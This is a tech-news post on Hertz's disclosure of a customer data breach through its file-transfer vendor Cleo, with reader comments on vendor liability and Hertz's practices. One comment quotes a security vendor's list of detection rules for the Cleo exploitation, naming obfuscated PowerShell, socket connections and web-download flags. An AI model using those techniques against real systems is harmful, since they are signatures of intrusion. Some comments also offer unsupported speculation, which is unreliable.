Hertz Says Customers' Personal Data, Driver's Licenses Stolen In Data Breach

An anonymous reader quotes a report from TechCrunch: Car rental giant Hertz has begun notifying its customers of a data breach that included their personal information and driver's licenses. The rental company, which also owns the Dollar and Thrifty brands, said in notices on its website that the breach relates to a cyberattack on one of its vendors between October 2024 and December 2024. The stolen data varies by region, but largely includes Hertz customer names, dates of birth, contact information, driver's licenses, payment card information, and workers' compensation claims. Hertz said a smaller number of customers had their Social Security numbers taken in the breach, along with other government-issued identification numbers.

Notices on Hertz's websites disclosed the breach to customers in Australia, Canada, the European Union, New Zealand, and the United Kingdom. Hertz also disclosed the breach with several U.S. states, including California and Maine. Hertz said at least 3,400 customers in Maine were affected but did not list the total number of affected individuals, which is likely to be significantly higher. Emily Spencer, a spokesperson for Hertz, would not provide TechCrunch with a specific number of individuals affected by the breach but said it would be "inaccurate to say millions" of customers are affected. The company attributed the breach to a vendor, software maker Cleo, which last year was at the center of a mass-hacking campaign by a prolific Russia-linked ransomware gang.

workers' compensation claims?

[Anonymous Coward]

Rather odd data type. Would love to know more about this but I'm sure it's hush hush.

Re:

[awwshit]

"We completed this data analysis on April 2, 2025, and concluded that the personal information involved in this event may
include the following: name, contact information, date of birth, credit card information, driver’s license information and
information related to workers’ compensation claims. A very small number of individuals may have had their Social Security
or other government identification numbers, passport information, Medicare or Medicaid ID (associated with workers’
compensation c

Hm.

[fropenn]

A company that can't even effectively run a car rental business now reveals it can't even keep your data private. Big surprise.

But they essentially have a monopoly at many airports, so if you want to rent a car...?

Re: Hm.

[zawarski]

They said the breach was not their fault, it was the fault of a vendor they hired. You expect them to be responsible for who they hire?

Re:

[Virtucon]

Subcontractors are still your responsibility but since Hertz is in the hands of its bondholders, they'll say anything to avoid accountability.

Re:

[Alypius]

Pretty sure Target learned this the hard way when they were hacked in 2013 [columbia.edu] thanks to a contractor who maintained their POS devices.

Then again, at this point, the "P" in "PII" stands for "Publicly."

Re:

[thegarbz]

You expect them to be responsible for who they hire?

Errr yes. Contract competency management is a real thing. The liability lies with the company who contracted out to an incompetent vendor.

Re:

[ZombieCatInABox]

You expect them to be responsible for who they hire?

Huh... Yes ?

Re:

[kmoser]

"It wasn't the company's fault, it was the fault of the *employee* who was hired by the *other employee*."

Re:

[thegarbz]

But they essentially have a monopoly at many airports, so if you want to rent a car...?

Do they? I mean I fly around professionally so I've been to many airports, from the world's largest, to airports small enough that you pay the airport tax to a vending machine which gives you a receipt so you can walk past the one security guard at the place.

I can't say I've ever seen an airport where Hertz was the only option.

That said Hertz do more than rentals. They have a full logistics service, in that regard they do have a monopoly. If you want a company to do secure transfers through a potentially da

Re:

[fropenn]

Hertz owns Dollar, Thrifty, and Firefly Car Rental; 36% market share behind only Enterprise (which owns Enterprise, Alamo, and National), and ahead of Avis (which owns Avis, Budget, and Payless, and Zipcar). The larger airports will offer more choices, although realistically you are choosing between only 3 companies (despite how many "brands" appear), or you could try one of the local host companies such as Turo; but medium or smaller airports may only have a choice of 1 or 2 of these companies, leaving you

How?

[Ogive17]

How do we keep having these breaches? It's not the breach that gives me the most concern by the data they were apparently able to extract.

It's criminal negligence in my opinion.

Re: How?

[zawarski]

By who? Hertz? How are they criminally negligent? I am sure they can show how their vendor had all the certificates, policies and procedures - as far as they were legally required to verify - in place. I am sure the vendor can do the same. Oh, you are seeing a pattern here?

Re: How?

[OrangeTide]

My data and agreements, implicit or explicit, are with Hertz. Everyone should sue them. If Hertz wants to pass the issue onto their contractors, then they are free to attempt to sue them as well.

Maybe that's and unpleasant amount of litigation. But ultimate we have to settle our disputes in a way that is fair.

Re:

[Random361]

How do we keep having these breaches? It's not the breach that gives me the most concern by the data they were apparently able to extract.

It's criminal negligence in my opinion.

It is. Unfortunately, until the United States adopts actual data privacy standards nothing is going to ever change. In America you wind up having to pay to get taken off bullshit spam "people finder" lists, most of which have horribly inaccurate data to begin with. Spam calls? The FTC has never and will never enforce those rules. Oh, and then they exempt politicians and other groups from the spam restrictions, so come election season I might as well turn my phone off. And the solution is not something like

Re:

[Virtucon]

Shit code, uninspired leadership, no accountability. Hertz is failing miserably and the people that work there day to day don't give a shit.

Re:

[snowshovelboy]

Well, I'll say from the technology and implementation side, we need more opinionated standards for federated identity, and open source solutions that are easy to set up and install. Entra is a confusing pile of shit. And don't even get me started on the other enterprise identity providers. Big-IP f5 is legit the worst piece of software I have ever worked with in my entire life. Its such complete shit, in fact, that its easier to roll your own than to configure it. That's why people roll their own and ge

Re:

[Tony Isaac]

How do we NOT keep having these headaches? No company is safe. Not even one.

Why do we keep having burglaries, shoplifting, bank robberies, car thefts? Shouldn't we have figured out how to stop these crimes by now? I mean, cars have been around for 100+ years!

We will continue to have data breaches, as long as we continue to have criminals. It's just crime...on a computer.

Was it DOGE?

[drinkypoo]

They seem to be helping themselves to a lot of data that they are prohibited from having by law these days

Re: Was it DOGE?

[OrangeTide]

Maybe BigBalls handed DOGE credentials to buddies in Russia. The Trump administration can find a fall guy and lay all the blame on him. They can whisk him away to thier terrorist concentration camp to avoid any unpleasant revelations that would happen in a trial.

A few years ago..

[Anonymous Coward]

I worked as a contractor at Hertz a few years ago, trying to undo some of the stupid things that happen when a company goes bankrupt. Their systems are largely undocumented, and most of the people who put the Rube Goldberg device of an infrastructure together were laid off or retired. They're now at the mercy of IT contracting firms trying to untangle it. It'd be better if they scrapped it and started over, but with this breach, I'm not surprised one bit.

There's also another company CDK that should be on everyone's RADAR. If you've ever bought a car, had service at a dealership, etc. you're in their databases including your PII. Almost every car and power sports dealership uses it.

It's amazing what kind of shit code and architecture is out there.

Lock âem upâ¦

[boxless]

In the past, because of poor record keeping, they lost some cars. They blamed the last person that rented the car. More than that, they convinced local police to arrest and jail the renter. And if you didnâ(TM)t have bail? Sucks to be you.

Why on earth the police went along with this was a mystery. I hope the wrongfully imprisoned customers are suing the pants off of hertz and police.

Now Iâ(TM)m paranoid. Whenever I drop off a car at the airport for any vendor, I take a picture of it in the ret

Hertz....it's always Hertz.

[ozzymodus12]

There is a lawyer on YouTube that has all of these insane stories about Hertz customers getting screwed, sometimes years after the fact. Sometimes, I really wonder about how screwed up this company must be for the amount of hate.

Re:

[aicrules]

Assuming you mean Steve Lehto he just released a video on this today lol

Want a Hertz donut?

[Slashythenkilly]

Not only is the announcement 4 months late, they are going to shift the blame to the lowest bidding bottom feeder so ypu as a consumer get virtually nothing. I had no choice but to use them for travel because of a corporate contract and they were every bit as fun to deal with then. They would hand you the keys and a smile, then comb over your vehicle with a magnifying glass upon return with $$ in their eyes.

Cleo is a file transfer platform

[Mirnotoriety]

“Cleo is a vendor that provides a file transfer platform [hertz.com] used by Hertz for limited purposes”

“Cleo Harmony [cleo.com]® provides you with reliable and scalable data communications with the control, governance, and security you need for your internal and external exchanges”

Dec 10, 2024: Widespread Exploitation of Cleo File Transfer Software (CVE-2024-55956) [rapid7.com]

“Below is a non-exhaustive list of rules deployed and alerting on behavior related to this threat”:

* Suspicious Process - XORed Data in PowerShell
* Suspicious Process - PowerShell System.Net.Sockets.TcpClient
* Attacker Behavior - Possible Cleo MFT Exploitation 2024
* Attacker Tool - PowerShell -noni -ep -nop Flags
* Attacker Behavior - Obfuscated Powershell Script Containing -noni -ep -nop Flags
* Suspicious Process - Powershell Invoke-WebRequest

Making up numbers

[kmoser]

[...] a spokesperson for Hertz, would not provide TechCrunch with a specific number of individuals affected by the breach but said it would be “inaccurate to say millions” of customers are affected.

Interesting how companies are incompetent enough to allow their data to be stolen, but just competent enough to know exactly which records were accessed. If the breach was performed well, forensics will show far fewer records leaked than actually were.

Getting out of hand!

[gabrieltss]

These data breaches are getting out of hand. I think it's time:

1) Laws heavily penalizing companies who get breached.

2) Customers of companies start suing the hell out of them for data breaches. F! forced arbitration clauses!

You'd have to be nuts to rent from Hertz.

[hey!]

Hertz is a company notorious for adding surprise charges to rental fees, charging bogus damage claims, and even having customers arrested for auto theft because Hertz failed to log the car returned in their systems. Plus they just have shitty customer service. Data breeches are hardly surprising considering how poorly the companies are run and in particular their systems.

Dollar and Thrifty are the same company and have the same problems. I never rent from Dollar, Thrifty or Hertz, it's not worth the has